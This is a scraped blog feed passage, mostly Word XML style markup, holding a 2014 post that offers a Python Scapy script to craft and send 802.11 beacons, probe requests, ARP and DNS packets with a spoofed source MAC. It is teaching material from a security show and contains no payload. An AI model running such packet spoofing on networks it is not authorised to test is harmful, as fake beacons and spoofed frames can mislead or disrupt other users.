UnhideWhenUsed="false" Name="Light Grid Accent 5"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 5"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 5"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 5"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 5"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 5"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 5"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 5"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 5"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 5"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 5"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 5"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Shading Accent 6"/>
<w:LsdException Locked="false" Priority="61" SemiHidden="false"
UnhideWhenUsed="false" Name="Light List Accent 6"/>
<w:LsdException Locked="false" Priority="62" SemiHidden="false"
UnhideWhenUsed="false" Name="Light Grid Accent 6"/>
<w:LsdException Locked="false" Priority="63" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 1 Accent 6"/>
<w:LsdException Locked="false" Priority="64" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Shading 2 Accent 6"/>
<w:LsdException Locked="false" Priority="65" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 1 Accent 6"/>
<w:LsdException Locked="false" Priority="66" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium List 2 Accent 6"/>
<w:LsdException Locked="false" Priority="67" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 1 Accent 6"/>
<w:LsdException Locked="false" Priority="68" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 2 Accent 6"/>
<w:LsdException Locked="false" Priority="69" SemiHidden="false"
UnhideWhenUsed="false" Name="Medium Grid 3 Accent 6"/>
<w:LsdException Locked="false" Priority="70" SemiHidden="false"
UnhideWhenUsed="false" Name="Dark List Accent 6"/>
<w:LsdException Locked="false" Priority="71" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Shading Accent 6"/>
<w:LsdException Locked="false" Priority="72" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful List Accent 6"/>
<w:LsdException Locked="false" Priority="73" SemiHidden="false"
UnhideWhenUsed="false" Name="Colorful Grid Accent 6"/>
<w:LsdException Locked="false" Priority="19" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Emphasis"/>
<w:LsdException Locked="false" Priority="21" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Emphasis"/>
<w:LsdException Locked="false" Priority="31" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtle Reference"/>
<w:LsdException Locked="false" Priority="32" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Intense Reference"/>
<w:LsdException Locked="false" Priority="33" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Book Title"/>
<w:LsdException Locked="false" Priority="37" Name="Bibliography"/>
<w:LsdException Locked="false" Priority="39" QFormat="true" Name="TOC Heading"/>
</w:LatentStyles>
</xml><![endif]-->
<!--[if gte mso 10]>
<style>
/* Style Definitions */
table.MsoNormalTable
{mso-style-name:"Table Normal";
mso-tstyle-rowband-size:0;
mso-tstyle-colband-size:0;
mso-style-noshow:yes;
mso-style-priority:99;
mso-style-parent:"";
mso-padding-alt:0in 5.4pt 0in 5.4pt;
mso-para-margin:0in;
mso-para-margin-bottom:.0001pt;
line-height:115%;
mso-pagination:widow-orphan;
font-size:11.0pt;
mso-bidi-font-size:10.0pt;
font-family:Arial;
color:black;}
</style>
<![endif]-->
<!--StartFragment-->
<!--EndFragment--><br />
<div class="normal">
<br /></div>
Unknownnoreply@blogger.com2tag:blogger.com,1999:blog-2320276621879394553.post-49781104834029577932014-01-16T11:17:00.002-08:002014-01-16T11:21:58.872-08:00Sending 802.11 Packets with Scapy<br />
To accompany my recent technical segment on Paul Assadorian's Security Weekly show, here is a functional Python example of sending 802.11 beacons, probe requests, ARP and DNS requests. Enjoy!<br />
<br />
<div class="p1">
<br /></div>
<div class="p1">
<br /></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">#!/usr/bin/env python</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">"""</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">802.11 Scapy Packet Example</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">Author: Joff Thyer, 2014</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">"""</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"># if we set logging to ERROR level, it supresses the warning message</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"># from Scapy about ipv6 routing</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"># WARNING: No route found for IPv6 destination :: (no default route?)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s1">import</span> logging</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">logging.getLogger(<span class="s2">"scapy.runtime"</span>).setLevel(logging.ERROR)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s1">from</span> scapy.<span class="s3">all</span> <span class="s1">import</span> *</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p4">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s4">class</span><span class="s5"> </span>Scapy80211<span class="s5">():</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p5">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> </span><span class="s4">def </span><span class="s3">__init__</span><span class="s5">(self,intf=</span>'wlan0'<span class="s5">,ssid=</span>'test'<span class="s5">,\</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> source=</span>'00:00:de:ad:be:ef'<span class="s5">,\</span></span><br />
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> bssid=</span>'00:11:22:33:44:55'<span class="s5">,srcip=</span>'10.10.10.10'<span class="s5">):</span></span><br />
<span style="font-family: Courier New, Courier, monospace;"><span class="s5" style="font-size: x-small;"><br /></span></span></div>
<div class="p6">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> self.rates = </span><span class="s2">"</span>\x03\x12\x96\x18\x24\x30\x48\x60<span class="s2">"</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> self.ssid = ssid</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> self.source = source</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> self.srcip = srcip</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> self.bssid = bssid</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> self.intf = intf</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> self.intfmon = intf + <span class="s2">'mon'</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> </span># set Scapy conf.iface</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> conf.iface = self.intfmon</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> </span># create monitor interface using iw</span></div>
<div class="p5">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> cmd = </span>'/sbin/iw dev %s interface add %s type monitor >/dev/null 2>&1'<span class="s5"> </span><span class="s1">\</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> % (self.intf, self.intfmon)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">try</span>:</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> os.system(cmd)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">except</span>:</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">raise</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">def</span> <span class="s3">Beacon</span>(self,count=<span class="s2">10</span>,ssid=<span class="s2">''</span>,dst=<span class="s2">'ff:ff:ff:ff:ff:ff'</span>):</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">if</span> <span class="s4">not</span> ssid: ssid=self.ssid</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> beacon = Dot11Beacon(cap=<span class="s2">0x2104</span>)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> essid = Dot11Elt(ID=<span class="s2">'SSID'</span>,info=ssid)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> rates = Dot11Elt(ID=<span class="s2">'Rates'</span>,info=self.rates)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> dsset = Dot11Elt(ID=<span class="s2">'DSset'</span>,info=<span class="s2">'</span><span class="s1">\x01</span><span class="s2">'</span>)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> tim = Dot11Elt(ID=<span class="s2">'TIM'</span>,info=<span class="s2">'</span><span class="s1">\x00\x01\x00\x00</span><span class="s2">'</span>)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> pkt = RadioTap()<span class="s1">\</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /Dot11(<span class="s3">type</span>=<span class="s2">0</span>,subtype=<span class="s2">8</span>,addr1=dst,addr2=self.source,addr3=self.bssid)<span class="s1">\</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /beacon/essid/rates/dsset/tim</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p5">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> </span><span class="s3">print</span><span class="s5"> </span>'[*] 802.11 Beacon: SSID=[%s], count=%d'<span class="s5"> % (ssid,count)</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">try</span>:</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sendp(pkt,iface=self.intfmon,count=count,inter=<span class="s2">0.1</span>,verbose=<span class="s2">0</span>)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">except</span>:</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">raise</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">def</span> <span class="s3">ProbeReq</span>(self,count=<span class="s2">10</span>,ssid=<span class="s2">''</span>,dst=<span class="s2">'ff:ff:ff:ff:ff:ff'</span>):</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">if</span> <span class="s4">not</span> ssid: ssid=self.ssid</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> param = Dot11ProbeReq()</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> essid = Dot11Elt(ID=<span class="s2">'SSID'</span>,info=ssid)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> rates = Dot11Elt(ID=<span class="s2">'Rates'</span>,info=self.rates)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> dsset = Dot11Elt(ID=<span class="s2">'DSset'</span>,info=<span class="s2">'</span><span class="s1">\x01</span><span class="s2">'</span>)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> pkt = RadioTap()<span class="s1">\</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /Dot11(<span class="s3">type</span>=<span class="s2">0</span>,subtype=<span class="s2">4</span>,addr1=dst,addr2=self.source,addr3=self.bssid)<span class="s1">\</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /param/essid/rates/dsset</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p5">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> </span><span class="s3">print</span><span class="s5"> </span>'[*] 802.11 Probe Request: SSID=[%s], count=%d'<span class="s5"> % (ssid,count)</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">try</span>:</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sendp(pkt,count=count,inter=<span class="s2">0.1</span>,verbose=<span class="s2">0</span>)</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">except</span>:</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s4">raise</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<span style="font-size: x-small;"><br /></span>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">def</span> <span class="s2">ARP</span>(self,targetip,count=<span class="s3">1</span>,toDS=<span class="s2">False</span>):</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">if</span> <span class="s1">not</span> targetip: <span class="s1">return</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> arp = LLC()/SNAP()/ARP(op=<span class="s3">'who-has'</span>,psrc=self.srcip,pdst=targetip,hwsrc=self.source)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">if</span> toDS:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> pkt = RadioTap()<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /Dot11(<span class="s2">type</span>=<span class="s3">2</span>,subtype=<span class="s3">32</span>,FCfield=<span class="s3">'to-DS'</span>,<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> addr1=self.bssid,addr2=self.source,addr3=<span class="s3">'ff:ff:ff:ff:ff:ff'</span>)<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /arp</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">else</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> pkt = RadioTap()<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /Dot11(<span class="s2">type</span>=<span class="s3">2</span>,subtype=<span class="s3">32</span>,<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> addr1=<span class="s3">'ff:ff:ff:ff:ff:ff'</span>,addr2=self.source,addr3=self.bssid)<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /arp</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> </span><span class="s2">print</span><span class="s5"> </span>'[*] ARP Req: who-has %s'<span class="s5"> % (targetip)</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">try</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sendp(pkt,inter=<span class="s3">0.1</span>,verbose=<span class="s3">0</span>,count=count)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">except</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">raise</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> ans = sniff(lfilter = <span class="s1">lambda</span> x: x.haslayer(ARP) <span class="s1">and</span> x.op == <span class="s3">2</span>,</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> store=<span class="s3">1</span>,count=<span class="s3">1</span>,timeout=<span class="s3">1</span>)</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">if</span> <span class="s2">len</span>(ans) > <span class="s3">0</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">return</span> ans[<span class="s3">0</span>][ARP].hwsrc</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">else</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">return</span> <span class="s2">None</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">def</span> <span class="s2">DNSQuery</span>(self,query=<span class="s3">'www.google.com'</span>,qtype=<span class="s3">'A'</span>,ns=<span class="s2">None</span>,count=<span class="s3">1</span>,toDS=<span class="s2">False</span>):</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">if</span> ns == <span class="s2">None</span>: <span class="s1">return</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> dstmac = self.ARP(ns)</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> dns = LLC()/SNAP()/IP(src=self.srcip,dst=ns)/<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> UDP(sport=random.randint(<span class="s3">49152</span>,<span class="s3">65535</span>),dport=<span class="s3">53</span>)/<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> DNS(qd=DNSQR(qname=query,qtype=qtype))</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">if</span> toDS:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> pkt = RadioTap()<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /Dot11(<span class="s2">type</span>=<span class="s3">2</span>,subtype=<span class="s3">32</span>,FCfield=<span class="s3">'to-DS'</span>,<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> addr1=self.bssid,addr2=self.source,addr3=dstmac)/dns</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">else</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> pkt = RadioTap()<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> /Dot11(<span class="s2">type</span>=<span class="s3">2</span>,subtype=<span class="s3">32</span>,<span class="s4">\</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> addr1=dstmac,addr2=self.source,addr3=self.bssid)/dns</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s5"> </span><span class="s2">print</span><span class="s5"> </span>'[*] DNS query %s (%s) -> %s?'<span class="s5"> % (query,qtype,ns)</span></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">try</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sendp(pkt,count=count,verbose=<span class="s3">0</span>)</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">except</span>:</span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s1">raise</span></span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p1">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"># main routine</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><span class="s1">if</span> __name__ == <span class="s2">"__main__"</span>:</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> <span class="s3">print</span> <span class="s2">"""</span></span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[*] 802.11 Scapy Packet Crafting Example</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[*] Assumes 'wlan0' is your wireless NIC!</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">[*] Author: Joff Thyer, 2014</span></div>
<div class="p3">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;">"""</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sdot11 = Scapy80211(intf=<span class="s2">'wlan0'</span>)</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sdot11.Beacon()</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sdot11.ProbeReq()</span></div>
<div class="p2">
</div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"> sdot11.DNSQuery(ns=<span class="s2">'10.10.10.2'</span>)</span></div>
<div class="p2">
<span style="font-family: Courier New, Courier, monospace; font-size: x-small;"><br /></span></div>
<div class="p2">
<br /></div>
Unknownnoreply@blogger.com6tag:blogger.com,1999:blog-2320276621879394553.post-11313634544819280392013-01-02T06:38:00.001-08:002013-01-03T06:41:40.235-08:00Remote Access VPN with Linux racoon and MAC-OSX<!--[if gte mso 9]><xml>
<o:DocumentProperties>
<o:Revision>0</o:Revision>
<o:TotalTime>0</o:TotalTime>
<o:Pages>1</o:Pages>
<o:Words>333</o:Words>
<o:Characters>1900</o:Characters>
<o:Company>NWN</o:Company>
<o:Lines>15</o:Lines>
<o:Paragraphs>4</o:Paragraphs>
<o:CharactersWithSpaces>2229</o:CharactersWithSpaces>
<o:Version>14.0</o:Version>
</o:DocumentProperties>
<o:OfficeDocumentSettings>
<o:AllowPNG/>
</o:OfficeDocumentSettings>
</xml><![endif]-->
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:View>Normal</w:View>
<w:Zoom>0</w:Zoom>
<w:TrackMoves/>
<w:TrackFormatting/>
<w:PunctuationKerning/>
<w:ValidateAgainstSchemas/>
<w:SaveIfXMLInvalid>false</w:SaveIfXMLInvalid>
<w:IgnoreMixedContent>false</w:IgnoreMixedContent>
<w:AlwaysShowPlaceholderText>false</w:AlwaysShowPlaceholderText>
<w:DoNotPromoteQF/>
<w:LidThemeOther>EN-US</w:LidThemeOther>
<w:LidThemeAsian>JA</w:LidThemeAsian>
<w:LidThemeComplexScript>X-NONE</w:LidThemeComplexScript>
<w:Compatibility>
<w:BreakWrappedTables/>
<w:SnapToGridInCell/>
<w:WrapTextWithPunct/>
<w:UseAsianBreakRules/>
<w:DontGrowAutofit/>
<w:SplitPgBreakAndParaMark/>
<w:EnableOpenTypeKerning/>
<w:DontFlipMirrorIndents/>
<w:OverrideTableStyleHps/>
<w:UseFELayout/>
</w:Compatibility>
<m:mathPr>
<m:mathFont m:val="Cambria Math"/>
<m:brkBin m:val="before"/>
<m:brkBinSub m:val="--"/>
<m:smallFrac m:val="off"/>
<m:dispDef/>
<m:lMargin m:val="0"/>
<m:rMargin m:val="0"/>
<m:defJc m:val="centerGroup"/>
<m:wrapIndent m:val="1440"/>
<m:intLim m:val="subSup"/>
<m:naryLim m:val="undOvr"/>
</m:mathPr></w:WordDocument>
</xml><![endif]--><!--[if gte mso 9]><xml>
<w:LatentStyles DefLockedState="false" DefUnhideWhenUsed="true"
DefSemiHidden="true" DefQFormat="false" DefPriority="99"
LatentStyleCount="276">
<w:LsdException Locked="false" Priority="0" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Normal"/>
<w:LsdException Locked="false" Priority="9" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="heading 1"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 2"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 3"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 4"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 5"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 6"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 7"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 8"/>
<w:LsdException Locked="false" Priority="9" QFormat="true" Name="heading 9"/>
<w:LsdException Locked="false" Priority="39" Name="toc 1"/>
<w:LsdException Locked="false" Priority="39" Name="toc 2"/>
<w:LsdException Locked="false" Priority="39" Name="toc 3"/>
<w:LsdException Locked="false" Priority="39" Name="toc 4"/>
<w:LsdException Locked="false" Priority="39" Name="toc 5"/>
<w:LsdException Locked="false" Priority="39" Name="toc 6"/>
<w:LsdException Locked="false" Priority="39" Name="toc 7"/>
<w:LsdException Locked="false" Priority="39" Name="toc 8"/>
<w:LsdException Locked="false" Priority="39" Name="toc 9"/>
<w:LsdException Locked="false" Priority="35" QFormat="true" Name="caption"/>
<w:LsdException Locked="false" Priority="10" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Title"/>
<w:LsdException Locked="false" Priority="1" Name="Default Paragraph Font"/>
<w:LsdException Locked="false" Priority="11" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Subtitle"/>
<w:LsdException Locked="false" Priority="22" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Strong"/>
<w:LsdException Locked="false" Priority="20" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="Emphasis"/>
<w:LsdException Locked="false" Priority="59" SemiHidden="false"
UnhideWhenUsed="false" Name="Table Grid"/>
<w:LsdException Locked="false" UnhideWhenUsed="false" Name="Placeholder Text"/>
<w:LsdException Locked="false" Priority="1" SemiHidden="false"
UnhideWhenUsed="false" QFormat="true" Name="No Spacing"/>
<w:LsdException Locked="false" Priority="60" SemiHidden="false"
